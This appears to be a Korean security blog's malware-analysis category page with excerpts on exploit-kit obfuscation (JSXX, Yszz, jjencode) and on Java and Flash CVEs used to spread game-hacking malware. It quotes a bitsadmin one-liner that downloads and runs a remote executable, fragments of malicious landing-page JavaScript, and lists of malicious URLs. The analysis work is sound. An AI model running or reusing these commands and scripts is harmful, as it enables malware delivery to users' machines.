Category: Malware

wget과 유사한 윈도우 기본 명령어 bitsadmin

악성코드 분석글을 읽다 윈도우 환경에서 wget 명령어와 유사하게 파일을 다운로드 할 수 있는 기본 명령어가 있어 메모해 둡니다. ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://example.com/a.bin "%APPDATA%\a.exe">nul&start %APPDATA%\a.exe 본 명령어는 Windows 7 이후부터 기본 명령어로 탑재된 것으로 보입니다. 출처 : https://isc.sans.edu/forums/diary/Microsoft+BITS+Used+to+Download+Payloads/21027

한국 Lulzsec 공격 분석

1. 개요 한동안 스크립트 분석을 하지 않다 최근 lulzsec이 한국에서 활동한다는 소식을 접하고 관련 샘플을 찾아서 분석을 해봤습니다. 이 샘플이 그 샘플이 맞는지는 모르겠으나 허접하게 작성되었네요 -_-; 관련기사 : http://dailysecu.com/news_view.php?article_id=8208 2. jjencode 난독화 부분 우선 원본 코드 입니다. jjencode로 난독화 되어 있습니다. $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"('"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"___"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"____"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"____\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"______/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\__//"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\__/_____\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"//_____\\\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+".."+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"::"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"::"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+"\_____/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+"/_\\"+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+"____"+$.$__+$.___+"||"+$.$__+$.___+"______"+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+"_-_"+$.$__+$.___+"/"+$.$__+$.___+"\\"+$.$__+$.___+"_-_-_"+$.$__+$.___+"/"+$.$__+$.___+"|"+$.$__+$.___+"______"+$.$__+$.___+"|/_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"_\\_-_-_-_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/____"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\______\\_________"+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+"\"+$.__$+$.$_$+$.$$_+"\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"');"+""")())(); 난독화 되어 있는 코드를 디코딩 하면 아래와 같은 결과가 나옵니다. alert(' ___ …

JSXX 0.44 VIP

최근 경향은 대부분 자바 취약점이네요. 간단하게 한번 디코딩 하여 살펴보았습니다. http://5b8.co/m L http://5b8.co/m/index.html L http://5b8.co/m/swfobject.js L http://5b8.co/m/jpg.js L http://5b8.co/m/jvTDIYE7.html L http://5b8.co/m/GAHNr0.html 원본 코드는 아래와 같습니다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> var YdgJw3=navigator.userAgent.toLowerCase(); var SPRB3="1"+"1"+"1"; if(document.cookie.indexOf("xcDHL4=")==-1 && YdgJw3.indexOf("linux")<=-1 && YdgJw3.indexOf("bot")==-1 && YdgJw3.indexOf("spider")==-1) { var pxtXtt1=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); SPRB3="0"; document.cookie="xcDHL4=Yes;path=/;expires="+expires.toGMTString(); FTYdkdd0="1";delete FTYdkdd0;try{FTYdkdd0+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";}catch(e){var Huaqmm1="1";XtpkDF6 …

Yszz 1.5 vip 관련 코드 확인

오랜만에 보여서 한번 살펴봤는데 예전과 많이 달라져서 기록해 둔다. http://festival.cocobau.com/adm_site/e_show/e_th_ad.js L http://205.164.25.148/pic/img.js L http://205.164.25.148/pic/img.html L http://205.164.25.148/pic/XLL0zxmA.jpg (CVE?) L http://205.164.25.148/pic/rKQeVOG.jpg (CVE-2011-3544) L http://205.164.25.148/pic/9O4v7e.html (CVE-2011-1255) L http://205.164.25.148/pic/yNDGhP.js L http://205.164.25.148/pic/bmrYt.html (CVE-2012-1889) L http://205.164.25.148/pic/swfobject.js L http://205.164.25.148/pic/jpg.js L http://205.164.25.148/pic/css.html img.html 파일을 디코딩 해보도록 하자. "Yszz 1.5 vip" 라는 주석이 들어가는게 특징으로 보인다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script language =javascript> …

또 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2012-0754)

국내에서 전파되는 온라인게임핵 악성코드 전파용 취약점이 또 하나가 새롭게 추가가 되었습니다. CVE-2012-0754 : http://www.exploit-db.com/exploits/18572/ Exploit-DB 사이트에 올라오자 마자 바로 자기네들에 맞게 수정하여 전파하네요. 아래는 이번에 국내에서 발견된 해당 취약점과 관련된 SWF 파일 내부에 작성되어 있는 액션 스크립트 입니다. 이전에 발견된 CVE-2011-2140 취약점과 아주 유사하게 구성되어 있으며 취약점과 관련된 MP4 파일명도 CVE-2011-2140 취약점은 ea.jpg 그리고 이번에 …

새로운 난독화 해제 방법 (Encrypt By Dadong’s JSXX 0.41 VIP)

Encrypt By Dadong blahblah 라고 주석을 남기던 난독화 코드가 버전업을 했습니다.이제는 아래와 같은 주석을 남기네요. [code]Encrypt By www.krmeok.com’s JSXX 0.41 VIPEncrypt By 도메인명’s JSXX 0.41 VIP[/code] 아마도 "Encrypt By Dadong" 이라는 문자열로 시그니처를 만들기 시작해서 그것을 회피하고자 바꾼 것으로 추측됩니다.추가로 디코딩 방법은 0.41로 버전업 하기 전과 동일한 방법으로 풀리며, 디코딩 하는 새로운 방법을 확인하여 기록해 …

새롭게 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2011-3544)

최근 국내에서 전파되는 온라인게임핵 악성코드와 관련하여 추가된 취약점이 있어 공유합니다. http://www.yo****ow.com/63/pps.html L http://www.yo****ow.com/63/jpg.js 이번주부터 추가되어 전파되는 것으로 보이며, CVE-2011-3544 (Oracle Java Applet Rhino Script Engine Remote Code Execution) 취약점으로 Oracle Java SE JDK and JRE 7 and 6 Update 27 이전 버전이면 감염이 됩니다. http://www.yo****ow.com/63/pps.html 코드를 살펴보면 이전과는 다른점을 확인할 수 있습니다. <script src=jpg.js></script> <script> …

새로운 URL 암호화 방법

최근 악성코드 중 아래와 같은 페이지에 접속하여 특정 명령을 받아 실행하는 악성코드를 확인하였습니다. hxxp://211.255.23.46/counter/update.txt 위 주소에 접속하면 아래와 같이 숫자만 나타나게 됩니다. 049058104116116112058047047049050049046050053052046049054053046049048053047105099111110115047107114046101120101 관련 악성코드를 분석해본 결과 예전에는 단순히 주소 혹은 XOR로 암호화 하였으나 이번엔 좀 새로운 패턴으로 한것을 확인하였습니다. 복호화는 아래 페이지에서 가능하도록 기능을 추가 하였습니다. http://119.194.217.188:8080/Honeypot/ ‘new’ 텍스트 박에서 해당 값을 입력하면 아래와 …

난독화 코드 그리고 제작자의 실수?

최근 난독화 코드 중 새롭게 작성된 코드를 확인하여 공유 합니다. 우선 코드는 아래와 같습니다.[code]<script>var a1 = "ABCDEFG";var a2 = "HIJKLMNOP";var a3 = "QRSTUVWXYZabcdef";var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";function mydata(input){        var output="";        var chr1,chr2,chr3="";        var enc1,enc2,enc3,enc4="";        var i=0;        var base64test=/[^A-Za-z0-9+\/\=]/g;        …

Adobe Flash Player CVE-2011-2140 취약점 간단 분석

금일 분석하다 처음보는 취약점을 확인하여 기록합니다. 우선 특정 사이트에 아래와 같이 삽입이 되어 있었습니다. function user(){ var January="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+ "<object width=\"550\" height=\"400\">\r\n"+ "<param name=\"movie\" value=\"done.swf\">\r\n"+ "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n"+ "<\/embed>\r\n"+ "<\/object>" ; var info = navigator.userAgent.toLowerCase(); var win = (navigator.platform == "Win32") || (navigator.platform == "Windows"); var ck=code(); var March = info.indexOf('msie 7.0'); var …